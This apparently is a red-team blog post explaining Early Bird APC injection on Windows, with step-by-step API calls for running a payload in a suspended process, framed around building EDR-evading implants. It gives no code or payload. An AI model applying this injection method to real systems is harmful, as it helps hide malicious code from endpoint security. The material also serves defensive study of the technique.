Early Birds

Outflank released an interesting post about Early Cascade Injection.

Recently I was able to get my hands on Outflank OST and use it to build and compile implants that target specific EDR solutions with zero detections, which comes in very handy during red team engagements. One of the injection techniques used by Outflank's implants is Early Cascade injection, which builds on the same idea as the well-known Early Bird APC injection: run the payload while the target process is still initialising, before it reaches its entry point.

Let's break it down.

QueueUserAPC is commonly used for local APC injection, but the same API can execute a payload in a remote process: all it needs is a handle to a thread in that process opened with THREAD_SET_CONTEXT access.

APC injection only works if the target thread actually drains its APC queue. That happens when the thread enters an alertable wait (SleepEx, WaitForSingleObjectEx and similar, with bAlertable set to TRUE) or when a thread that has not started running yet is resumed; the QueueUserAPC documentation states that such a thread begins by calling the APC function. Threads in either state are hard to find in an arbitrary process, especially from a normal user context, and an APC queued to a thread that never becomes alertable simply never runs.

The solution is to create the target process ourselves with the CreateProcess WinAPI and the CREATE_SUSPENDED flag. CreateProcess returns a handle to the new process's main thread, which has not started running yet and therefore meets the APC delivery criteria. When the thread is resumed, the queued APC runs before the executable's entry point, which is what the "Early Bird" name refers to. This method is known as Early Bird APC Injection.

📝 Implementation Steps

The implementation logic of this technique will be as follows:

  1. Create a suspended process with CreateProcess and the CREATE_SUSPENDED flag.

  2. Allocate memory in the new process with VirtualAllocEx, write the payload there with WriteProcessMemory, and make the region executable (VirtualProtectEx).

  3. Pass the main-thread handle returned by CreateProcess and the payload's remote base address (cast to PAPCFUNC) to QueueUserAPC.

  4. Resume the thread with ResumeThread; the APC is delivered as the thread starts and the payload executes.

Injection Process

CreateSuspendedProcess2 is the helper that performs the first step of Early Bird APC Injection: it creates the suspended target process and returns the handles the rest of the injection needs. It takes 4 arguments:

  • lpProcessName - The name of the process to create.

  • dwProcessId - A pointer to a DWORD which will receive the newly created process's PID.

  • hProcess - Pointer to a HANDLE that will receive the newly created process's handle.

  • hThread - Pointer to a HANDLE that will receive the handle of the new process's main thread, which is still suspended.

The screenshot below shows the newly created target process in a debugged state. Process Hacker highlights a process in purple when a debugger is attached to it, which is what you get when the process is created with the DEBUG_PROCESS flag rather than CREATE_SUSPENDED; a process that is merely suspended is not highlighted this way.

Next, the payload is written to the process memory.

The payload is executed.
